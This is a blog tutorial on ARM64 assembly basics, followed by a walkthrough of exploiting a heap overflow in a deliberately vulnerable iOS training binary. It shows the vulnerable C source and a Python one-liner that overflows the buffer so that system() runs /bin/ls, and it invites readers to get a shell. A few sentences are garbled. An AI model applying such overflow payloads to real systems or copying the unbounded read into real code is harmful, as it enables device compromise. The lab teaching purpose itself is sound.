Hi everyone! In this blog series, we will be understanding the ARM instruction set and using that to reverse ARM binaries, followed by writing exploits for them. So let's start with the basics of ARM64.

ARM64 Intro

ARM64 is a family of RISC (reduced instruction set computer) architecture. The distinguishing factor of a RISC architecture is the use of a small, highly-optimized set of instructions, rather than the more specialized set often found in other types of architecture (for e.g. CISC). ARM64 follows the Load/Store approach, in which both operands and destination must be in registers. The load–store architecture is an instruction set architecture that divides instructions into two categories: memory access (load and store between memory and registers), and ALU operations (which only occur between registers). This differs from a register–memory architecture (for example, a CISC instruction set architecture such as x86) in which one of the operands for the ADD operation may be in memory, while the other is in a register. Using ARM architecture is ideal for mobile devices, since the RISC architecture requires fewer transistors, and hence leads to less power consumption and heating of the device, thereby leading to a better battery life which is essential for mobile devices.

Both the current iOS and Android phones use ARM processors, and the newer ones use ARM64 specifically. Reversing ARM64 assembly code is therefore vital to understanding the internal workings of any binary or app. It is impossible to cover the whole ARM64 instruction set in this blog series and hence we will be focusing on the most useful instructions and the most commonly used registers. It is also important to note that ARM64 is also referred to as ARMv8 (8.1, 8.3 etc) while ARM32 is ARMv7(s).

ARMv8 (ARM64) maintains compatibility with the existing 32-bit architecture by using two execution states - Aarch32 and Aarch64. In Aarch32 state, the processor can only access 32-bit registers. In Aarch64 state, the processor can access 32-bit and 64-bit registers. ARM64 has several general-purpose and special-purpose registers. The general-purpose registers are those which do not have side effects, and hence can be used by most instructions. One can do arithmetic with them, use them for memory addresses, and so on. The special-purpose registers also do not have side effects, but can only be used for certain purposes and only by certain instructions. Other instructions may depend on their values implicitly. One example of this is the Stack Pointer register. And then we have control registers - these registers have side effects. On ARM64 these are registers like TTBR (Translation Table Base Register), which holds the base pointer of the current page tables. Many of these will be privileged and can only be used by kernel code. Some control registers, however, can be used by anyone. In the image below we can see some control registers from the XNU kernel.

[Image: Example of some control registers used in the iOS kernel]

The modern OS expects to have several privilege levels which it can use to control access to resources. An example of this is the split between the kernel and the userland. Armv8 enables this split by implementing different levels of privilege, which are referred to as Exception levels in the Armv8-A architecture. ARMv8 has several exception levels that are numbered (EL0, EL1 etc), the higher the number the higher the privilege. When taking an exception, the exception level can either increase or remain the same. However, when returning from an exception, the exception level can either decrease or remain the same. Execution state (Aarch32 or Aarch64) can change by taking or returning from an exception. On powerup, the device enters the highest exception level.

In terms of privilege EL0 < EL1 < EL2 < EL3

[Image: Example of Exception levels in ARM]

ARM64 Registers

The following list defines the different ARM64 registers and their purpose

  • x0-x30 are 64-bit general purpose registers. Their bottom halves can be accessed via w0-w30.
  • There are four stack pointer registers SP_EL0, SP_EL1, SP_EL2, SP_EL3 (one for each exception level) which are 64-bit wide. Apart from that there are three exception link registers ELR_EL1, ELR_EL2, ELR_EL3, three saved program status registers SPSR_EL1, SPSR_EL2, SPSR_EL3, and one Program Counter register (PC).
  • Arm also uses PC-relative addressing, wherein it specifies the operand address relative to the PC (base address). This helps in producing position-independent code.
  • In ARM64 (unlike ARM32), the PC cannot be accessed by most instructions, especially not directly. The PC is modified indirectly using jump or stack-related instructions.
  • Similarly, the SP (Stack Pointer) register is never modified implicitly (for e.g. using push/pop calls).
  • The Current Program Status Register (CPSR) holds the same program status flags as the APSR along with some additional information.
  • The first register in an opcode is usually the destination, the rest are sources (except for str, stp)
| Registers | Purpose |
| --- | --- |
| x0 - x7 | Arguments (up to 8) - rest on stack |
| x8 - x18 | General purpose, hold variables. No assumptions can be made upon returning from a function |
| x19 - x28 | If used by a function, must have their values preserved and later restored upon returning to the caller |
| x29 (fp) | Frame Pointer (points to bottom of frame) |
| x30 (lr) | Link Register. Holds the return address of a call |
| x16 | Holds the system call number in an (SVC 0x80) call |
| x31 (sp/(x/w)zr) | Stack Pointer (sp) or zero register (xzr or wzr) |
| PC | Program Counter register. Contains the address of the next instruction to be executed |
| APSR / CPSR | Current Program Status Register (holds flags) |
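The relationship between the x and w names of a general purpose register can be sketched in a few lines of Python. This is a toy model, not an emulator: the `Reg` class and the example values are made up for illustration. It shows that reading wN yields the bottom 32 bits of xN, and that writing wN zero-extends, clearing the top 32 bits of xN.

```python
MASK32 = (1 << 32) - 1


class Reg:
    """Toy model of one general purpose register (x0-x30)."""

    def __init__(self):
        self.x = 0  # full 64-bit value

    @property
    def w(self):
        # Reading wN returns the bottom 32 bits of xN.
        return self.x & MASK32

    @w.setter
    def w(self, value):
        # Writing wN zero-extends: the top 32 bits of xN are cleared.
        self.x = value & MASK32


r0 = Reg()
r0.x = 0x1122334455667788
low_half = r0.w          # bottom half of x0
r0.w = 0xDEADBEEF        # write through the 32-bit view
after_w_write = r0.x     # upper half is now zero
```

The zeroing on a w write is worth remembering when reading disassembly: a `mov w0, ...` also determines the full contents of x0.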

ARM64 calling convention

  • Arguments are passed in x0-x7 registers, rest are passed on the stack
  • The ret instruction is used to return to the address in the link register (the default register is x30)
  • The return value of the function is stored in x0 or x0+x1 depending on whether it is 64-bit or 128-bit
  • x8 is the indirect result register, used to pass the address location of an indirect result, for example, where a function returns a large structure
  • A plain branch to a function happens using the B opcode.
  • Branch with link (BL) copies the address of the next instruction (after the BL) into the link register (x30) before branching
  • BL is hence used for subroutine calls
  • BR is used to branch to a register, for e.g. br x8
  • BLR is used to branch to a register and store the address of the next instruction (after the BLR) into the link register (x30)
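The interaction between BL, BLR and RET described above can be sketched as a tiny Python model. The register dictionary and the addresses (0x1000, 0x2000, 0x3000) are hypothetical values chosen for illustration. The only architectural facts it relies on are that A64 instructions are 4 bytes long and that the link register is x30.

```python
INSN_SIZE = 4  # every A64 instruction is 4 bytes long


def bl(regs, target):
    """BL target: save the return address in x30, then branch."""
    regs["x30"] = regs["pc"] + INSN_SIZE
    regs["pc"] = target


def blr(regs, reg_name):
    """BLR xN: like BL, but the target address comes from a register."""
    target = regs[reg_name]  # read the target before x30 is overwritten
    regs["x30"] = regs["pc"] + INSN_SIZE
    regs["pc"] = target


def ret(regs, reg_name="x30"):
    """RET: branch to the address held in x30 (or another named register)."""
    regs["pc"] = regs[reg_name]


regs = {"pc": 0x1000, "x30": 0, "x8": 0x3000}
bl(regs, 0x2000)           # call a subroutine
in_callee = regs["pc"]
saved_lr = regs["x30"]
ret(regs)                  # return to the instruction after the BL
after_ret = regs["pc"]

blr(regs, "x8")            # indirect call through x8
after_blr = (regs["pc"], regs["x30"])
```

Because x30 is overwritten by every BL or BLR, a function that makes calls of its own has to save x30 first, which is what the function prologue does.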

ARM Opcodes

| Opcodes | Purpose |
| --- | --- |
| MOV | Move one register to another |
| MOVN | Move the bitwise NOT of a shifted 16-bit immediate to register (used to load negative values) |
| MOVK | Move 16 bits into register and leave the rest unchanged |
| MOVZ | Move a shifted 16-bit immediate to register, zeroing the rest |
| lsl/lsr | Logical shift left, logical shift right |
| ldr | Load register |
| str | Store register |
| ldp/stp | Load/store two registers behind each other |
| adr | Address of label at PC-relative offset |
| adrp | Address of page at PC-relative offset |
| cmp | Compare two values, flags are updated automatically (N if result is negative, Z if result is zero, C if no borrow, V if signed overflow) |
| bne | Branch if zero flag is not set |
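To make the difference between the MOV variants and the flag behaviour of cmp concrete, here is a minimal Python sketch. The function names are illustrative, and the model only covers 64-bit registers. It assumes the usual semantics: MOVZ zeroes the untouched bits, MOVK keeps them, MOVN writes the inverted immediate, and CMP is a subtraction that only sets NZCV.

```python
MASK64 = (1 << 64) - 1


def movz(imm16, shift=0):
    """MOVZ: place a 16-bit immediate at `shift`, zero every other bit."""
    return (imm16 & 0xFFFF) << shift


def movk(reg, imm16, shift=0):
    """MOVK: replace 16 bits at `shift`, keep every other bit."""
    cleared = reg & ~(0xFFFF << shift) & MASK64
    return cleared | ((imm16 & 0xFFFF) << shift)


def movn(imm16, shift=0):
    """MOVN: write the bitwise NOT of the shifted immediate."""
    return ~((imm16 & 0xFFFF) << shift) & MASK64


def cmp_flags(a, b):
    """CMP a, b: compute a - b on 64 bits and return the NZCV flags."""
    a &= MASK64
    b &= MASK64
    result = (a - b) & MASK64
    sign_a, sign_b, sign_r = a >> 63, b >> 63, result >> 63
    return {
        "N": sign_r,                                   # result is negative
        "Z": int(result == 0),                         # result is zero
        "C": int(a >= b),                              # set when no borrow
        "V": int(sign_a != sign_b and sign_r != sign_a),  # signed overflow
    }


x0 = movz(0xBEEF)            # movz x0, #0xbeef
x0 = movk(x0, 0xDEAD, 16)    # movk x0, #0xdead, lsl #16
inverted = movn(1)           # movn x0, #1
equal = cmp_flags(5, 5)      # Z is set, so a following bne is not taken
smaller = cmp_flags(1, 2)    # borrow occurs, so C is clear and N is set
```

A MOVZ followed by one or more MOVK instructions is the common way compilers build a constant that does not fit in a single immediate.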

System Registers

Apart from this, there might be some system-specific registers as well, which are available only on that particular OS. For e.g., the below registers are present in iOS

[Image: system registers present in iOS]

Reading/Writing System Registers

MRS Xt, systemreg -> Read from system register into destination register Xt

MSR systemreg, Xt -> Write to system register the value stored in Xt register

For e.g. use MSR PAN, #1 to set the PAN bit and MSR PAN, #0 to clear the PAN bit

Function Prologue/Epilogue

Prologue - Appears at the beginning of the function, prepares the stack and registers for use within the function

Epilogue - Appears at the end of the function, restores the stack and registers to the original state before the function call

[Image: Function Prologue/Epilogue]

Examples

  • mov x0, x1 -> x0 = x1
  • movn x0, 1 -> x0 = ~1 = -2
  • add x0, x0, x1 -> x0 = x0 + x1
  • ldr x0, [x1] -> x0 = *x1 -> x0 = value at the address stored in x1
  • ldr x0, [x1, 0x10]! -> x1 += 0x10; x0 = *x1 (Pre-Indexing mode)
  • ldr x0, [x1], 0x10 -> x0 = *x1; x1 += 0x10 (Post-Indexing mode)
  • str x0, [x1] -> *x1 = x0 -> Destination is on the right
  • ldr x0, [x1, 0x10] -> x0 = *(x1 + 0x10)
  • ldrb w0, [x1] -> Load a byte from the address stored in x1
  • ldrsb w0, [x1] -> Load a signed byte from the address stored in x1
  • adr x0, label -> Load the address of label into x0
  • stp x0, x1, [x2] -> *x2 = x0; *(x2 + 8) = x1
  • stp x29, x30, [sp, -64]! -> Store x29, x30 (LR) on the stack
  • ldp x29, x30, [sp], 64 -> Restore x29, x30 (LR) from the stack
  • svc 0 -> Perform a syscall (syscall number in the x16 register)
  • str x0, [x29] -> Store x0 at the address in x29 (destination on the right)
  • ldr x0, [x29] -> Load the value from the address in x29 into x0
  • blr x0 -> Call the subroutine at the address stored in x0, store the address of the next instruction in the link register (x30)
  • br x0 -> Jump to the address stored in x0
  • bl label -> Branch to label, store the address of the next instruction in the link register (x30)
  • bl printf -> Call the printf function with arguments stored in x0, x1
  • ret -> Jump to the address stored in x30
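The three ldr addressing modes in the examples above differ only in when the base register is updated. The following Python sketch models them on a small flat memory. The `Machine` class, the addresses and the stored values are all made up for illustration.

```python
import struct


class Machine:
    """Toy CPU state: a register dict plus a flat little-endian memory."""

    def __init__(self, size=0x100):
        self.mem = bytearray(size)
        self.regs = {}

    def load64(self, addr):
        return struct.unpack_from("<Q", self.mem, addr)[0]

    def store64(self, addr, value):
        struct.pack_into("<Q", self.mem, addr, value)

    def ldr_offset(self, rt, rn, imm):   # ldr rt, [rn, imm]
        self.regs[rt] = self.load64(self.regs[rn] + imm)

    def ldr_pre(self, rt, rn, imm):      # ldr rt, [rn, imm]!
        self.regs[rn] += imm             # base is updated first
        self.regs[rt] = self.load64(self.regs[rn])

    def ldr_post(self, rt, rn, imm):     # ldr rt, [rn], imm
        self.regs[rt] = self.load64(self.regs[rn])
        self.regs[rn] += imm             # base is updated afterwards


m = Machine()
m.store64(0x20, 0xAAAA)
m.store64(0x30, 0xBBBB)

m.regs["x1"] = 0x20
m.ldr_offset("x0", "x1", 0x10)           # x1 is left untouched
offset_result = (m.regs["x0"], m.regs["x1"])

m.ldr_pre("x0", "x1", 0x10)              # x1 moves, then the load happens
pre_result = (m.regs["x0"], m.regs["x1"])

m.regs["x1"] = 0x20
m.ldr_post("x0", "x1", 0x10)             # the load happens, then x1 moves
post_result = (m.regs["x0"], m.regs["x1"])
```

The same pattern explains the prologue and epilogue pair: `stp x29, x30, [sp, -64]!` is a pre-indexed store that first moves sp down by 64, and `ldp x29, x30, [sp], 64` is a post-indexed load that moves sp back up afterwards.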

A Simple Heap Overflow

Let's write a simple heap overflow exploit for an ARM binary.

Your task is to exploit a heap overflow vulnerability in the vuln binary to execute a command of your choice. The binaries are compiled for the iOS platform so need to be run on a jailbroken iOS device.

The binaries for this and the next article can be found here

SSH to your Corellium (or jailbroken iOS) device and run the vuln binary

$ vuln

Run the binary vuln. You get a message that says "Better luck next time"

[Image: output of running the vuln binary]

Let's open up the binary in Hopper to see what's going on. Let's have a look at the main function.

[Image: the main function in Hopper]

So, it's clear what we need to do to jump to the function heapOverflow

In order to do that, the following requirements must be met

  1. Pass three arguments (or two, because the first argument in a C program is the command with which the program is invoked)
  2. argv[1] should be the string "heap"
  3. argv[2] should be some argument that gets passed as the first argument to the function heapOverflow

Just to recall

A main function in C has the prototype

int main(int argc, char **argv)

argc - An integer that contains the count of arguments that follow in argv. The argc parameter is always greater than or equal to 1.

argv - An array of null-terminated strings representing command-line arguments entered by the user of the program. By convention, argv[0] is the command with which the program is invoked, argv[1] is the first command-line argument, and so on, until argv[argc], which is always NULL
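The requirements listed above can be restated as a short Python sketch of the dispatch logic. This is a reconstruction from the three requirements, not the binary's actual code: the exact comparison on argc, and any other branches the real main may contain, are assumptions, and `heap_overflow` is only a stand-in.

```python
def heap_overflow(filename):
    # Stand-in for the real heapOverflow function.
    return f"heapOverflow({filename!r})"


def main(argv):
    # argv[0] is the program name, so two user arguments mean len(argv) == 3.
    # Assumption: the real binary may compare argc differently.
    if len(argv) == 3 and argv[1] == "heap":
        return heap_overflow(argv[2])
    return "Better luck next time"


no_args = main(["vuln"])
with_args = main(["vuln", "heap", "input.txt"])
```

Running the binary with no arguments corresponds to the first call, which is why the "Better luck next time" message showed up earlier.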

Let's also take a look at the pseudocode of the heapOverflow function. Note that the pseudocode shows up for 32-bit arch but still gives you a good idea of the program flow.

[Image: pseudocode of the heapOverflow function]

So it seems like it tries to open a file with the name as the first argument which is passed to it.

At the end, there is also a call to the system function which executes a command, the input is the r22 (or x22) register

The allocation for r21 (x21) is 0x400 bytes, which is read using the following fread command

fread(r21, 0x1, r20, r19);

Let's create a simple file on the device and pass it as input to the vuln binary.

echo "Hello World" > input.txt
./vuln heap input.txt

[Image: output of ./vuln heap input.txt]

Then information technology seems like information technology prints out the input for the whoami command

Let's cheat a chip to look at the Source code itself

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void heapOverflow(char *filename){
    printf("Heap overflow challenge. Execute a shell command of your choice on the device\n");
    printf("Welcome: from %s, printing out the current user\n", filename);
    FILE *f = fopen(filename, "rb");
    fseek(f, 0, SEEK_END);
    size_t fs = ftell(f);      /* file size, fully attacker controlled */
    fseek(f, 0, SEEK_SET);
    char *name = malloc(0x400);
    char *command = malloc(0x400);
    strcpy(command, "whoami");
    fread(name, 1, fs, f);     /* copies fs bytes into a 0x400-byte buffer */
    system(command);
    return;
}

Sure enough, passing a file with a length of more than 0x400 bytes will overflow into the adjacent memory and might end up overwriting the string "command", and thus when the system call is made, we might be able to run our own commands.
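The overflow can be modelled in Python before touching the device. The sketch below treats the heap as one bytearray and assumes the two 0x400-byte allocations sit directly next to each other with nothing in between. That layout is an assumption about the allocator, not something the source code guarantees. The `simulate` function is illustrative and mirrors the strcpy, fread and system calls in order.

```python
CHUNK = 0x400


def simulate(file_bytes):
    """Model name and command as two back-to-back 0x400-byte chunks."""
    heap = bytearray(2 * CHUNK)
    name_off, command_off = 0, CHUNK   # assumed adjacent layout

    # strcpy(command, "whoami") copies the string plus its NUL terminator.
    heap[command_off:command_off + 7] = b"whoami\x00"

    # fread(name, 1, fs, f) copies the whole file with no bounds check.
    # (This model truncates at the end of its toy heap.)
    data = file_bytes[:len(heap) - name_off]
    heap[name_off:name_off + len(data)] = data

    # system(command) reads a C string: everything up to the first NUL.
    end = heap.index(0, command_off)
    return heap[command_off:end].decode()


short_run = simulate(b"Hello World\n")
payload = b"/" * CHUNK + b"/bin/ls\x00"
long_run = simulate(payload)
```

A short file leaves the command buffer alone, while a file of 0x400 filler bytes followed by a NUL-terminated string replaces the command that system() will run.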

On the Corellium device, use the following command to generate the malicious file

python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt

Then pass it as input to the binary.

vuln heap hax.txt

[Image: output of vuln heap hax.txt]

Instead of the whoami command, the ls command gets executed.

Can you try and get a shell on the device using this?

References

  • https://github.com/Siguza/ios-resources/blob/master/bits/arm64.md
  • https://github.com/Billy-Ellis/Exploit-Challenges
  • https://developer.arm.com/documentation/ddi0487/latest/arm-architecture-reference-manual-armv8-for-armv8-a-architecture-profile
  • https://exploit.education